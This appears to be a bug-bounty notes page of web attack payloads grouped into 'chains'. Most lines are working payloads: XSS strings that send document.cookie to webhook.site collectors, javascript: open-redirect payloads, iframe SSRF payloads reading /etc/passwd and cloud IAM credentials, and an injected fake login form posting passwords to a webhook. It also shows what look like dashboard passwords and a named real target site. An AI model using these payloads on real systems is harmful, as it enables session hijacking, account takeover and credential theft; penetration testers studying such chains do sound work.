Bugs Chains

Reflected XSS to Account Take Over

https://xss.report/dashboard swagpk Synack@3434
https://bxsshunter.com/dashboard Synack@3434
python3 -m http.server

'"><img src="x" onerror="document.location='https://webhook.site/7165e251-2ffe-450f-9132-06f74a722e43?cookie='+document.cookie">
'"><img src=x onerror="document.location='https://webhook.site/7165e251-2ffe-450f-9132-06f74a722e43?c='+document.cookie;">
'"><script>document.write('<img src="https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219?cookie='+document.cookie+'"/>')</script>

Open Redirect to DOM XSS

redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
redirectUrl=javascript:top[/al/.source+/ert/.source](document.cookie)
redirectUrl=javascript:confirm(document.cookie)
redirectUrl=<>javascript:alert(origin);

DOM XSS to (RFI) Remote File Inclusion

http://lms.ue.edu.pk/WebTop/Home.aspx?body=https://rfi.nessus.org/rfi.txt

Open Redirect to Account take Over via Access token

j%09avascript:document.location=%27https://webhook.site/88322504-926e-477c-a16e-5c6ba6b24b7a/%27%2bdocument.cookie

Reflected XSS to Open Redirect

'"><svg/onload="location.replace('https://evil.com')"
<script>document.location.href="https://evil.com/"</script>
<k AutoFocus contenteditable OnFocus="location.replace('https://evil.com')">

Stored XSS to SSRF in PDF generator

<iframe src="file:///etc/passwd">
'"><iframe src="file:///C:/windows/System32/drivers/etc/hosts">
<iframe src="http://169.254.169.254/latest/meta-data/">
<iframe src="http://169.254.169.254/latest/meta-data/iam/security-credentials/">

DOM XSS to Account Take Over

javascript:document.location=%27https://webhook.site/fd59355e-845b-4462-894a-c6809633adab/%27%2bdocument.cookie

HTML Injection to Phishing Steal Credentials to Accont Take Over

'><h3>Please login to proceed</h3> <form action=https://webhook.site/33f747e2-fdb7-468d-b3ae-d114d94e2219>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Login"></br>

HTML Injection to Open Redirect

"><meta http-equiv="Refresh" content="0; url='https://evil.com'"/>

SQLI to Open Redirect


0x27223E3C7376672F6F6E6C6F61643D226C6F636174696F6E2E7265706C616365282768747470733A2F2F6576696C2E636F6D272922
0x3C7376672F6F6E6C6F61643D226C6F636174696F6E2E7265706C616365282768747470733A2F2F6F70656E627567626F756E74792E6F7267272922

PreviousTemplate Nextsubfear.sh

Last updated 1 month ago

hashtagReflected XSS to Account Take Over

hashtagOpen Redirect to DOM XSS

hashtagDOM XSS to (RFI) Remote File Inclusion

hashtagOpen Redirect to Account take Over via Access token

hashtagReflected XSS to Open Redirect

hashtagStored XSS to SSRF in PDF generator

hashtagDOM XSS to Account Take Over

hashtagHTML Injection to Phishing Steal Credentials to Accont Take Over

hashtagHTML Injection to Open Redirect

hashtagSQLI to Open Redirect

Reflected XSS to Account Take Over

Open Redirect to DOM XSS

DOM XSS to (RFI) Remote File Inclusion

Open Redirect to Account take Over via Access token

Reflected XSS to Open Redirect

Stored XSS to SSRF in PDF generator

DOM XSS to Account Take Over

HTML Injection to Phishing Steal Credentials to Accont Take Over

HTML Injection to Open Redirect

SQLI to Open Redirect